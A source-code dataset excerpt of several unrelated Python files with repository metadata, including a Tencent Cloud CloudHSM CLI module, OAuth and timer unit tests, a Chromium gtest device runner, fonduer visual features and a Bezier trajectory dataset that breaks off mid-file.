g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.CloudhsmClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeVpcRequest()
model.from_json_string(json.dumps(args))
rsp = client.DescribeVpc(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeHSMByVpcId(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.CloudhsmClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeHSMByVpcIdRequest()
model.from_json_string(json.dumps(args))
rsp = client.DescribeHSMByVpcId(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeHSMBySubnetId(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.CloudhsmClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeHSMBySubnetIdRequest()
model.from_json_string(json.dumps(args))
rsp = client.DescribeHSMBySubnetId(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeUsg(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.CloudhsmClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeUsgRequest()
model.from_json_string(json.dumps(args))
rsp = client.DescribeUsg(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeSubnet(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.CloudhsmClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeSubnetRequest()
model.from_json_string(json.dumps(args))
rsp = client.DescribeSubnet(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeSupportedHsm(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.CloudhsmClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeSupportedHsmRequest()
model.from_json_string(json.dumps(args))
rsp = client.DescribeSupportedHsm(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doInquiryPriceBuyVsm(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.CloudhsmClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.InquiryPriceBuyVsmRequest()
model.from_json_string(json.dumps(args))
rsp = client.InquiryPriceBuyVsm(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeUsgRule(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.CloudhsmClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeUsgRuleRequest()
model.from_json_string(json.dumps(args))
rsp = client.DescribeUsgRule(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
CLIENT_MAP = {
"v20191112": cloudhsm_client_v20191112,
}
MODELS_MAP = {
"v20191112": models_v20191112,
}
ACTION_MAP = {
"ModifyVsmAttributes": doModifyVsmAttributes,
"DescribeVsmAttributes": doDescribeVsmAttributes,
"DescribeVsms": doDescribeVsms,
"DescribeVpc": doDescribeVpc,
"DescribeHSMByVpcId": doDescribeHSMByVpcId,
"DescribeHSMBySubnetId": doDescribeHSMBySubnetId,
"DescribeUsg": doDescribeUsg,
"DescribeSubnet": doDescribeSubnet,
"DescribeSupportedHsm": doDescribeSupportedHsm,
"InquiryPriceBuyVsm": doInquiryPriceBuyVsm,
"DescribeUsgRule": doDescribeUsgRule,
}
AVAILABLE_VERSION_LIST = [
"v20191112",
]
def action_caller():
return ACTION_MAP
def parse_global_arg(parsed_globals):
g_param = parsed_globals
is_exist_profile = True
if not parsed_globals["profile"]:
is_exist_profile = False
g_param["profile"] = "default"
configure_path = os.path.join(os.path.expanduser("~"), ".tccli")
is_conf_exist, conf_path = Utils.file_existed(configure_path, g_param["profile"] + ".configure")
is_cred_exist, cred_path = Utils.file_existed(configure_path, g_param["profile"] + ".credential")
conf = {}
cred = {}
if is_conf_exist:
conf = Utils.load_json_msg(conf_path)
if is_cred_exist:
cred = Utils.load_json_msg(cred_path)
if not (isinstance(conf, dict) and isinstance(cred, dict)):
raise ConfigurationError(
"file: %s or %s is not json format"
% (g_param["profile"] + ".configure", g_param["profile"] + ".credential"))
if OptionsDefine.Token not in cred:
cred[OptionsDefine.Token] = None
if not is_exist_profile:
if os.environ.get(OptionsDefine.ENV_SECRET_ID) and os.environ.get(OptionsDefine.ENV_SECRET_KEY):
cred[OptionsDefine.SecretId] = os.environ.get(OptionsDefine.ENV_SECRET_ID)
cred[OptionsDefine.SecretKey] = os.environ.get(OptionsDefine.ENV_SECRET_KEY)
cred[OptionsDefine.Token] = os.environ.get(OptionsDefine.ENV_TOKEN)
if os.environ.get(OptionsDefine.ENV_REGION):
conf[OptionsDefine.Region] = os.environ.get(OptionsDefine.ENV_REGION)
for param in g_param.keys():
if g_param[param] is None:
if param in [OptionsDefine.SecretKey, OptionsDefine.SecretId, OptionsDefine.Token]:
if param in cred:
g_param[param] = cred[param]
else:
raise ConfigurationError("%s is invalid" % param)
elif param in [OptionsDefine.Region, OptionsDefine.Output]:
if param in conf:
g_param[param] = conf[param]
else:
raise ConfigurationError("%s is invalid" % param)
try:
if g_param[OptionsDefine.ServiceVersion]:
g_param[OptionsDefine.Version] = "v" + g_param[OptionsDefine.ServiceVersion].replace('-', '')
else:
version = conf["cloudhsm"][OptionsDefine.Version]
g_param[OptionsDefine.Version] = "v" + version.replace('-', '')
if g_param[OptionsDefine.Endpoint] is None:
g_param[OptionsDefine.Endpoint] = conf["cloudhsm"][OptionsDefine.Endpoint]
except Exception as err:
raise ConfigurationError("config file:%s error, %s" % (conf_path, str(err)))
if g_param[OptionsDefine.Version] not in AVAILABLE_VERSION_LIST:
raise Exception("available versions: %s" % " ".join(AVAILABLE_VERSION_LIST))
return g_param
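# --- Hedged usage sketch (not part of the original module) ---
# How the generated ACTION_MAP above is typically driven by the CLI front
# end: look the action up, then call it with the parsed action arguments
# and the global parameters assembled by parse_global_arg(). The values in
# the commented example are placeholders, not real options or credentials.
def _dispatch(action, args, parsed_globals):
    try:
        handler = ACTION_MAP[action]
    except KeyError:
        raise Exception("unknown action: %s" % action)
    return handler(args, parsed_globals)

# Example (placeholder values):
#   _dispatch("DescribeVsms", {"Limit": 10, "Offset": 0}, parsed_globals)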
| 41.629108 | 105 | 0.71924 |
497b41d573fe318423e88053194d710303174585
| 617 |
py
|
Python
|
allauth/socialaccount/providers/pinterest/tests.py
|
joebos/django-allauth
|
cb624a2fe659e58ea343b9b16159427ce38aff69
|
[
"MIT"
] | null | null | null |
allauth/socialaccount/providers/pinterest/tests.py
|
joebos/django-allauth
|
cb624a2fe659e58ea343b9b16159427ce38aff69
|
[
"MIT"
] | null | null | null |
allauth/socialaccount/providers/pinterest/tests.py
|
joebos/django-allauth
|
cb624a2fe659e58ea343b9b16159427ce38aff69
|
[
"MIT"
] | null | null | null |
from allauth.socialaccount.tests import create_oauth2_tests
from allauth.tests import MockedResponse
from allauth.socialaccount.providers import registry
from .provider import PinterestProvider
class PinterestTests(create_oauth2_tests(
registry.by_id(PinterestProvider.id))):
def get_mocked_response(self):
return MockedResponse(200, """
{
"emailAddress": "[email protected]",
"firstName": "Raymond",
"id": "ZLARGMFT1M",
"lastName": "Penners",
"pictureUrl": "http://m.c.lnkd.licdn.com/mpr/mprx/0_e0hbvSLc",
"publicProfileUrl": "http://www.pinterest.com/in/intenct"
}
""")
| 28.045455 | 64 | 0.742301 |
3ce93d16336e8e5b4da7ab0bb668030f9f2c50ae
| 7,059 |
py
|
Python
|
build/android/pylib/gtest/local_device_gtest_run.py
|
kjthegod/chromium
|
cf940f7f418436b77e15b1ea23e6fa100ca1c91a
|
[
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | 1 |
2019-11-28T10:46:52.000Z
|
2019-11-28T10:46:52.000Z
|
build/android/pylib/gtest/local_device_gtest_run.py
|
kjthegod/chromium
|
cf940f7f418436b77e15b1ea23e6fa100ca1c91a
|
[
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | null | null | null |
build/android/pylib/gtest/local_device_gtest_run.py
|
kjthegod/chromium
|
cf940f7f418436b77e15b1ea23e6fa100ca1c91a
|
[
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | 2 |
2015-03-27T11:15:39.000Z
|
2016-08-17T14:19:56.000Z
|
# Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import logging
import os
from pylib import constants
from pylib import ports
from pylib.base import test_run
from pylib.device import device_errors
from pylib.gtest import gtest_test_instance
from pylib.local import local_test_server_spawner
from pylib.local.device import local_device_environment
from pylib.local.device import local_device_test_run
from pylib.utils import apk_helper
from pylib.utils import device_temp_file
_COMMAND_LINE_FLAGS_SUPPORTED = True
_EXTRA_COMMAND_LINE_FILE = (
'org.chromium.native_test.ChromeNativeTestActivity.CommandLineFile')
_EXTRA_COMMAND_LINE_FLAGS = (
'org.chromium.native_test.ChromeNativeTestActivity.CommandLineFlags')
_MAX_SHARD_SIZE = 256
# TODO(jbudorick): Move this up to the test instance if the net test server is
# handled outside of the APK for the remote_device environment.
_SUITE_REQUIRES_TEST_SERVER_SPAWNER = [
'content_unittests', 'content_browsertests', 'net_unittests', 'unit_tests'
]
class _ApkDelegate(object):
def __init__(self, apk):
self._apk = apk
self._package = apk_helper.GetPackageName(self._apk)
self._runner = apk_helper.GetInstrumentationName(self._apk)
self._component = '%s/%s' % (self._package, self._runner)
def Install(self, device):
device.Install(self._apk)
def RunWithFlags(self, device, flags, **kwargs):
with device_temp_file.DeviceTempFile(device.adb) as command_line_file:
device.WriteFile(command_line_file.name, '_ %s' % flags)
return device.StartInstrumentation(
self._component,
extras={_EXTRA_COMMAND_LINE_FILE: command_line_file.name},
raw=False,
**kwargs)
def Clear(self, device):
device.ClearApplicationState(self._package)
class _ExeDelegate(object):
  def __init__(self, tr, exe):
self._exe_host_path = exe
self._exe_file_name = os.path.split(exe)[-1]
self._exe_device_path = '%s/%s' % (
constants.TEST_EXECUTABLE_DIR, self._exe_file_name)
deps_host_path = self._exe_host_path + '_deps'
if os.path.exists(deps_host_path):
self._deps_host_path = deps_host_path
self._deps_device_path = self._exe_device_path + '_deps'
else:
self._deps_host_path = None
self._test_run = tr
def Install(self, device):
# TODO(jbudorick): Look into merging this with normal data deps pushing if
# executables become supported on nonlocal environments.
host_device_tuples = [(self._exe_host_path, self._exe_device_path)]
if self._deps_host_path:
host_device_tuples.append((self._deps_host_path, self._deps_device_path))
device.PushChangedFiles(host_device_tuples)
def RunWithFlags(self, device, flags, **kwargs):
cmd = [
self._test_run.GetTool(device).GetTestWrapper(),
self._exe_device_path,
flags,
]
cwd = constants.TEST_EXECUTABLE_DIR
env = {
'LD_LIBRARY_PATH':
'%s/%s_deps' % (constants.TEST_EXECUTABLE_DIR, self._exe_file_name),
}
try:
gcov_strip_depth = os.environ['NATIVE_COVERAGE_DEPTH_STRIP']
external = device.GetExternalStoragePath()
env['GCOV_PREFIX'] = '%s/gcov' % external
env['GCOV_PREFIX_STRIP'] = gcov_strip_depth
except (device_errors.CommandFailedError, KeyError):
pass
# TODO(jbudorick): Switch to just RunShellCommand once perezju@'s CL
# for long shell commands lands.
with device_temp_file.DeviceTempFile(device.adb) as script_file:
script_contents = ' '.join(cmd)
logging.info('script contents: %r' % script_contents)
device.WriteFile(script_file.name, script_contents)
output = device.RunShellCommand(['sh', script_file.name], cwd=cwd,
env=env, **kwargs)
return output
def Clear(self, device):
try:
device.KillAll(self._exe_file_name, blocking=True, timeout=30, retries=0)
except device_errors.CommandFailedError:
# Raised if there is no process with the given name, which in this case
# is all we care about.
pass
class LocalDeviceGtestRun(local_device_test_run.LocalDeviceTestRun):
def __init__(self, env, test_instance):
assert isinstance(env, local_device_environment.LocalDeviceEnvironment)
assert isinstance(test_instance, gtest_test_instance.GtestTestInstance)
super(LocalDeviceGtestRun, self).__init__(env, test_instance)
if self._test_instance.apk:
self._delegate = _ApkDelegate(self._test_instance.apk)
elif self._test_instance.exe:
self._delegate = _ExeDelegate(self, self._test_instance.exe)
self._servers = {}
#override
def TestPackage(self):
return self._test_instance._suite
#override
def SetUp(self):
def individual_device_set_up(dev, host_device_tuples):
# Install test APK.
self._delegate.Install(dev)
# Push data dependencies.
external_storage = dev.GetExternalStoragePath()
host_device_tuples = [
(h, d if d is not None else external_storage)
for h, d in host_device_tuples]
dev.PushChangedFiles(host_device_tuples)
self._servers[str(dev)] = []
if self.TestPackage() in _SUITE_REQUIRES_TEST_SERVER_SPAWNER:
self._servers[str(dev)].append(
local_test_server_spawner.LocalTestServerSpawner(
ports.AllocateTestServerPort(), dev, self.GetTool(dev)))
for s in self._servers[str(dev)]:
s.SetUp()
self._env.parallel_devices.pMap(individual_device_set_up,
self._test_instance.GetDataDependencies())
#override
def _ShouldShard(self):
return True
#override
def _CreateShards(self, tests):
device_count = len(self._env.devices)
shards = []
for i in xrange(0, device_count):
unbounded_shard = tests[i::device_count]
shards += [unbounded_shard[j:j+_MAX_SHARD_SIZE]
for j in xrange(0, len(unbounded_shard), _MAX_SHARD_SIZE)]
return [':'.join(s) for s in shards]
#override
def _GetTests(self):
tests = self._delegate.RunWithFlags(
self._env.devices[0], '--gtest_list_tests')
tests = gtest_test_instance.ParseGTestListTests(tests)
tests = self._test_instance.FilterTests(tests)
return tests
#override
def _RunTest(self, device, test):
# Run the test.
output = self._delegate.RunWithFlags(device, '--gtest_filter=%s' % test,
timeout=900, retries=0)
for s in self._servers[str(device)]:
s.Reset()
self._delegate.Clear(device)
# Parse the output.
# TODO(jbudorick): Transition test scripts away from parsing stdout.
results = self._test_instance.ParseGTestOutput(output)
return results
#override
def TearDown(self):
def individual_device_tear_down(dev):
for s in self._servers[str(dev)]:
s.TearDown()
self._env.parallel_devices.pMap(individual_device_tear_down)
| 33.77512 | 79 | 0.710582 |
3d8dbc633affb92750227abbfd47d9f2008eb4ae
| 1,325 |
py
|
Python
|
lib/timers_test.py
|
jakerogerz/glazier
|
10ee390e79c5fe65933a2699da851e27c03f8c60
|
[
"Apache-2.0"
] | null | null | null |
lib/timers_test.py
|
jakerogerz/glazier
|
10ee390e79c5fe65933a2699da851e27c03f8c60
|
[
"Apache-2.0"
] | null | null | null |
lib/timers_test.py
|
jakerogerz/glazier
|
10ee390e79c5fe65933a2699da851e27c03f8c60
|
[
"Apache-2.0"
] | 1 |
2019-11-25T10:56:20.000Z
|
2019-11-25T10:56:20.000Z
|
# Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for glazier.lib.timers."""
import datetime
from glazier.lib import timers
import mock
import unittest
class TimersTest(unittest.TestCase):
def setUp(self):
self.t = timers.Timers()
@mock.patch.object(timers.datetime, 'datetime', autospec=True)
def testNow(self, dt):
now = datetime.datetime.utcnow()
dt.utcnow.return_value = now
self.assertEqual(self.t.Now(), now)
def testGetAll(self):
time_2 = datetime.datetime.now()
self.t.Set('timer_1')
self.t.Set('timer_2', at_time=time_2)
self.assertEqual(self.t.Get('timer_2'), time_2)
all_t = self.t.GetAll()
self.assertIn('timer_1', all_t)
self.assertIn('timer_2', all_t)
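# Hedged usage sketch (not part of the original test module): the timers.Timers
# API exercised by the tests above, shown outside the unittest harness; the
# timer names are placeholders.
def _timers_usage_example():
  t = timers.Timers()
  t.Set('download_start')
  t.Set('download_end', at_time=datetime.datetime.utcnow())
  return t.GetAll()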
if __name__ == '__main__':
unittest.main()
| 29.444444 | 74 | 0.722264 |
69ee73633de7d6ecb6e3c3d8a417e05a459ec99d
| 3,516 |
py
|
Python
|
src/fonduer/features/feature_libs/visual_features.py
|
Prabh06/fonduer
|
c376dfb31f0595b7fe992e9ae7eaf23397125d65
|
[
"MIT"
] | null | null | null |
src/fonduer/features/feature_libs/visual_features.py
|
Prabh06/fonduer
|
c376dfb31f0595b7fe992e9ae7eaf23397125d65
|
[
"MIT"
] | null | null | null |
src/fonduer/features/feature_libs/visual_features.py
|
Prabh06/fonduer
|
c376dfb31f0595b7fe992e9ae7eaf23397125d65
|
[
"MIT"
] | null | null | null |
from fonduer.candidates.models import TemporarySpan
from fonduer.utils.data_model_utils import (
get_visual_aligned_lemmas,
is_horz_aligned,
is_vert_aligned,
is_vert_aligned_center,
is_vert_aligned_left,
is_vert_aligned_right,
same_page,
)
FEAT_PRE = "VIZ_"
DEF_VALUE = 1
unary_vizlib_feats = {}
binary_vizlib_feats = {}
def get_visual_feats(candidates):
candidates = candidates if isinstance(candidates, list) else [candidates]
for candidate in candidates:
args = tuple([arg.span for arg in candidate.get_contexts()])
if not (isinstance(args[0], TemporarySpan)):
raise ValueError(
"Accepts Span-type arguments, %s-type found." % type(candidate)
)
# Unary candidates
if len(args) == 1:
span = args[0]
# Add VisualLib entity features (if applicable)
if span.sentence.is_visual():
if span.stable_id not in unary_vizlib_feats:
unary_vizlib_feats[span.stable_id] = set()
for f, v in vizlib_unary_features(span):
unary_vizlib_feats[span.stable_id].add((f, v))
for f, v in unary_vizlib_feats[span.stable_id]:
yield candidate.id, FEAT_PRE + f, v
# Binary candidates
elif len(args) == 2:
span1, span2 = args
# Add VisualLib entity features (if applicable)
if span1.sentence.is_visual() or span2.sentence.is_visual():
for span, pre in [(span1, "e1_"), (span2, "e2_")]:
if span.stable_id not in unary_vizlib_feats:
unary_vizlib_feats[span.stable_id] = set()
for f, v in vizlib_unary_features(span):
unary_vizlib_feats[span.stable_id].add((f, v))
for f, v in unary_vizlib_feats[span.stable_id]:
yield candidate.id, FEAT_PRE + pre + f, v
if candidate.id not in binary_vizlib_feats:
binary_vizlib_feats[candidate.id] = set()
for f, v in vizlib_binary_features(span1, span2):
binary_vizlib_feats[candidate.id].add((f, v))
for f, v in binary_vizlib_feats[candidate.id]:
yield candidate.id, FEAT_PRE + f, v
else:
raise NotImplementedError(
"Only handles unary and binary candidates currently"
)
def vizlib_unary_features(span):
"""
Visual-related features for a single span
"""
if not span.sentence.is_visual():
return
for f in get_visual_aligned_lemmas(span):
yield "ALIGNED_" + f, DEF_VALUE
for page in set(span.get_attrib_tokens("page")):
yield "PAGE_[%d]" % page, DEF_VALUE
def vizlib_binary_features(span1, span2):
"""
Visual-related features for a pair of spans
"""
if same_page((span1, span2)):
yield "SAME_PAGE", DEF_VALUE
if is_horz_aligned((span1, span2)):
yield "HORZ_ALIGNED", DEF_VALUE
if is_vert_aligned((span1, span2)):
yield "VERT_ALIGNED", DEF_VALUE
if is_vert_aligned_left((span1, span2)):
yield "VERT_ALIGNED_LEFT", DEF_VALUE
if is_vert_aligned_right((span1, span2)):
yield "VERT_ALIGNED_RIGHT", DEF_VALUE
if is_vert_aligned_center((span1, span2)):
yield "VERT_ALIGNED_CENTER", DEF_VALUE
| 34.135922 | 79 | 0.595563 |
f5a74cfcbf5a3c58f466d9bd1ca84e6a913671e9
| 600 |
py
|
Python
|
tests/sanic/app.py
|
messa/graphql-server
|
f5e8302d1320b013b441844df059e90ae83d04a0
|
[
"MIT"
] | null | null | null |
tests/sanic/app.py
|
messa/graphql-server
|
f5e8302d1320b013b441844df059e90ae83d04a0
|
[
"MIT"
] | 2 |
2019-05-15T20:33:39.000Z
|
2019-05-15T22:44:22.000Z
|
tests/sanic/app.py
|
messa/graphql-server
|
f5e8302d1320b013b441844df059e90ae83d04a0
|
[
"MIT"
] | 2 |
2019-05-15T18:58:21.000Z
|
2019-06-30T09:56:11.000Z
|
from urllib.parse import urlencode
from sanic import Sanic
from sanic.testing import SanicTestClient
from graphql_server.sanic import GraphQLView
from .schema import Schema
def create_app(path="/graphql", **kwargs):
app = Sanic(__name__)
app.debug = True
schema = kwargs.pop("schema", None) or Schema
app.add_route(GraphQLView.as_view(schema=schema, **kwargs), path)
app.client = SanicTestClient(app)
return app
def url_string(uri="/graphql", **url_params):
string = "/graphql"
if url_params:
string += "?" + urlencode(url_params)
return string
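# Hedged usage sketch (not part of the original helper): issues a GET query
# against the app built above; '{hello}' is a placeholder query string, and the
# (request, response) pair follows SanicTestClient's return convention.
def example_graphql_get():
    app = create_app()
    request, response = app.client.get(url_string(query="{hello}"))
    return response.status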
| 20.689655 | 69 | 0.705 |
e422711132c3cb2156f113d5ac2ea1acdeaeb716
| 36,434 |
py
|
Python
|
costmap_dataset.py
|
Czworldy/GP_traj
|
96261f39a5a322092e3a6be98938bb4601f0f746
|
[
"MIT"
] | 1 |
2021-06-08T06:09:55.000Z
|
2021-06-08T06:09:55.000Z
|
costmap_dataset.py
|
Czworldy/GP_traj
|
96261f39a5a322092e3a6be98938bb4601f0f746
|
[
"MIT"
] | null | null | null |
costmap_dataset.py
|
Czworldy/GP_traj
|
96261f39a5a322092e3a6be98938bb4601f0f746
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import glob
import random
import numpy as np
from PIL import Image
import torch
from torch.utils.data import Dataset
import torchvision.transforms as transforms
import copy
from scipy.special import comb
np.set_printoptions(suppress=True, precision=4, linewidth=65535)
import matplotlib.pyplot as plt
def expand_control_points(point_array):
point_array_expand = copy.deepcopy(point_array)
size = point_array.shape[1]
assert size >= 3
for i in range(1,size-3):
p0, p1, p2 = point_array[:,i], point_array[:,i+1], point_array[:,i+2]
norm1, norm2 = np.linalg.norm(p0-p1), np.linalg.norm(p2-p1)
pc = p1 - 0.5*np.sqrt(norm1*norm2)*((p0-p1)/norm1 + (p2-p1)/norm2)
point_array_expand[:,i+1] = pc
return point_array_expand
def bernstein(t, i, n):
return comb(n,i) * t**i * (1-t)**(n-i)
def bezier_curve(t, point_array, bias=0):
t = np.clip(t, 0, 1)
n = point_array.shape[1]-1
    size = len(t) if isinstance(t, np.ndarray) else 1
    p = np.zeros((2, size))
new_point_array = np.diff(point_array, n=bias, axis=1)
for i in range(n+1-bias):
p += new_point_array[:,i][:,np.newaxis] * bernstein(t, i, n-bias) * n**bias
return p
class Bezier(object):
def __init__(self, time_list, x_list, y_list, v0, vf=(0.000001,0.000001)):
t0, x0, y0 = time_list[0], x_list[0], y_list[0]
t_span = time_list[-1] - time_list[0]
time_array = np.array(time_list)
x_array, y_array = np.array(x_list), np.array(y_list)
time_array -= t0
x_array -= x0
y_array -= y0
time_array /= t_span
point_array = np.vstack((x_array, y_array))
n = point_array.shape[1]+1
v0, vf = np.array(v0), np.array(vf)
p0 = point_array[:, 0] + v0/n
pf = point_array[:,-1] - vf/n
point_array = np.insert(point_array, 1, values=p0, axis=1)
point_array = np.insert(point_array,-1, values=pf, axis=1)
point_array_expand = expand_control_points(point_array)
self.t0, self.t_span = t0, t_span
self.x0, self.y0 = x0, y0
self.p0 = np.array([x0, y0]).reshape(2,1)
self.point_array = point_array
self.point_array_expand = point_array_expand
def position(self, time, expand=True):
time = np.clip(time, self.t0, self.t0+self.t_span)
t = (time - self.t0) / self.t_span
p = self.point_array_expand if expand else self.point_array
position = bezier_curve(t, p, bias=0)
return position + self.p0
def velocity(self, time, expand=True):
time = np.clip(time, self.t0, self.t0+self.t_span)
t = (time - self.t0) / self.t_span
p = self.point_array_expand if expand else self.point_array
return bezier_curve(t, p, bias=1)
def acc(self, time, expand=True):
time = np.clip(time, self.t0, self.t0+self.t_span)
t = (time - self.t0) / self.t_span
p = self.point_array_expand if expand else self.point_array
return bezier_curve(t, p, bias=2)
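# Hedged usage sketch (not part of the original file): the waypoints below are
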